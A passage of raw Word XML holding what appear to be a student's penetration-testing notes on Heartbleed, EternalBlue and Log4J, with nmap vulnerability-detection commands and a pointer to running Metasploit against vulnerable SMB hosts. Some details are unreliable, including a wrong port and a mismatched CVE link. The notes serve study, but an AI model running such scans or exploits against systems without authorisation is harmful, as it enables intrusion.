        <w:t>+ CVE-2021-44228</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ CVE-2014-0160</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>+ CVE-2017-0143</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33903791" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14B2A152" w14:textId="36334DD1" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Understanding Vulnerability Detail Pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E3B9F4" w14:textId="1014A3F8" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Descriptions</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>– What is it?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6378EE" w14:textId="752D4B3D" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Severity </w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>– Level of Criticality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45EC92D9" w14:textId="2A261F11" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>References</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>– Proof of Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD9406B" w14:textId="7626561C" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Weakness Enumeration </w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>– What has been collected?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E62F47" w14:textId="3D3227B4" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Known Affected Software Configurations </w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:tab/>
        <w:t>– What was impacted?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5078AF01" w14:textId="77777777" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DFBCC28" w14:textId="679D5B0B" w:rsidR="00685728" w:rsidRPr="002A77BD" w:rsidRDefault="00685728" w:rsidP="00685728">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If you can exploit it but can’t explain it, then you really didn’t exploit it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE5EF8F" w14:textId="77777777" w:rsidR="00C52D67" w:rsidRPr="002A77BD" w:rsidRDefault="00C52D67" w:rsidP="00C52D67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="096265BE" w14:textId="2D83247C" w:rsidR="00C52D67" w:rsidRPr="002A77BD" w:rsidRDefault="00C52D67" w:rsidP="00C52D67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Zero Day Exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BEE696" w14:textId="03788A3F" w:rsidR="00C52D67" w:rsidRPr="002A77BD" w:rsidRDefault="00C52D67" w:rsidP="00C52D67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Exploits should all be in the CVE numbering authority, determined as important.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A933CA7" w14:textId="23E07B27" w:rsidR="00C52D67" w:rsidRPr="002A77BD" w:rsidRDefault="00C52D67" w:rsidP="00C52D67">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero-day </w:t>
      </w:r>
      <w:r w:rsidR="002A3339" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>exploits,</w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> however, have not been reported as a CVE </w:t>
      </w:r>
      <w:r w:rsidR="002A3339" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>they have not been discovered before.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4501C923" w14:textId="77777777" w:rsidR="00C52D67" w:rsidRPr="002A77BD" w:rsidRDefault="00C52D67" w:rsidP="00C52D67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6B4860" w14:textId="74A1EC2E" w:rsidR="00C52D67" w:rsidRPr="002A77BD" w:rsidRDefault="00C52D67" w:rsidP="00C52D67">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Not all vulnerabilities are from computer code, they can be derived from social and physical vulnerabilities as well.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A11077" w14:textId="1B815744" w:rsidR="002E576F" w:rsidRPr="002A77BD" w:rsidRDefault="002E576F" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59CAD970" w14:textId="1E232D2E" w:rsidR="002E576F" w:rsidRPr="002A77BD" w:rsidRDefault="002E576F" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Risk Management -&gt; Vulnerability Management -&gt; Vulnerability Assessment -&gt; Pen Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E720D" w14:textId="2E7DBB88" w:rsidR="002E576F" w:rsidRPr="002A77BD" w:rsidRDefault="002E576F" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B1683" w14:textId="448ED35C" w:rsidR="002E576F" w:rsidRPr="002A77BD" w:rsidRDefault="002E576F" w:rsidP="00685728">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Asset Identification + Research</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0064269B" w14:textId="01C1A0B5" w:rsidR="00B1380B" w:rsidRDefault="002E576F" w:rsidP="00D81EF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>+ Fuzz Testing (input/handling validation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175C00B9" w14:textId="77777777" w:rsidR="00D81EF6" w:rsidRPr="00D81EF6" w:rsidRDefault="00D81EF6" w:rsidP="00D81EF6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64D98268"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NVD (CVE’s) -&gt; NIST-&gt; Exploit-DB (exploits themselves)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076CC160" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00420090" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidR="00B1380B" w:rsidRPr="00B1380B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-US"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2014-0160</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7243416F"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HeartBleed CVE-2014-0160</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19323D0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HeartBleed relates to the TLS/PTLS implementation of OpenSSL 1.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D142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LS will encrypt data in transmission; SSL is the software that allows for that transmission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08DA323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rivate-Public key infrastructure that leads to a shared key.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C56E54" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72265A2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llows attackers to gain sensitive information from process memory that trigger buffer over-read through heartbleed packets.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445CF7D0" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9BAD3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Does not allow unrestricted access to data, however it does exfil memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18512233" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B99C4B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Look at NVD and Exploit-DB to understand these CVE’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D41B4" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6E755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valuator Impact + Severity + Weakness Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E97D050" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="311F5AC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ssentially, attackers can gain the cryptographic keys which will essentially allow them to decrypt all traffic, something that TLS is meant to prevent.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE9D28B"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nmap -sV –script ssl-enum-ciphers -p 443 (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173EE0F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numerate the ciphers on the host and potentially determine if a vulnerability is present.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6248F54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ot super helpful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F5F883"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nmap -sV –script ssl-heartbleed -p 433 (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4B860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is nmap script is very helpful, as it will directly tell us if that host is vulnerable to HeartBleed. Extremely useful to find in a penetration test.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22612BC9"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 Remember to analyze the code within exploit-db, as in HeartBleed’s case, some of the exploits are only meant to determine if the host is vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D979D1"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 Run your NMAP scans!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2622F87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LS -&gt; TCP-handshake -&gt; Encrypt connection (pub/priv keys to encrypt shared key that is symmetric) -&gt; Client/Server communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A2567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pon giving it a different value than what the server was expecting for the password length, the attacker can cause the server to display the next parts of data in memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDB719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ssentially a buffer-overflow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A17257" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AC4E31" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A409ECB" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C18A849"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EternalBlue – MS17-010 (CVE-2017-0143)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58FCF0DA" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00420090" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidR="00B1380B" w:rsidRPr="00B1380B">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="0000FF"/>
            <w:kern w:val="0"/>
            <w:u w:val="single"/>
            <w:lang w:eastAsia="en-US"/>
            <w14:ligatures w14:val="none"/>
          </w:rPr>
          <w:t>https://nvd.nist.gov/vuln/detail/CVE-2017-0144</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7AB0D09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art of a WannaCry attack, affected hospitals across the world.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3FBC5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Zero-Day exploit that took advantage of SMBv1 in a buffer overflow exploit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64298DDA" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2933D73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retty much affected EVERY single OS run from Microsoft at the time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D4057D" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E3623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nmap -sV –script smb-vuln-ms17-010 -p 139,445 (HOST)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B3DE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can victim, if the vulnerable machine is hosting SMBv1 and is one of those vulnerable OSes, it’s worthwhile to run Metasploit modules onto it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C2BF0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ll take advantage of a buffer overflow using a specially crafted SMB packet containing a malicious payload (generally a reverse shell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B274FF9" w14:textId="77777777" w:rsidR="00B1380B" w:rsidRPr="00B1380B" w:rsidRDefault="00B1380B" w:rsidP="00B1380B">
      <w:pPr>
        <w:spacing w:line="256" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Calibri" w:hAnsi="Arial" w:cs="Arial"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="en-US"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E33FAE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Log4J (CVE-2021-44228)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2CEB5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84% of Java applications use Log4J for logging, for debugging and data collection. (crucial for developers, it’s just a log database for them).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="254D8C1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pache Tomcat (Web-App), Glassfish, etc. etc.</w:t>
      </w:r>
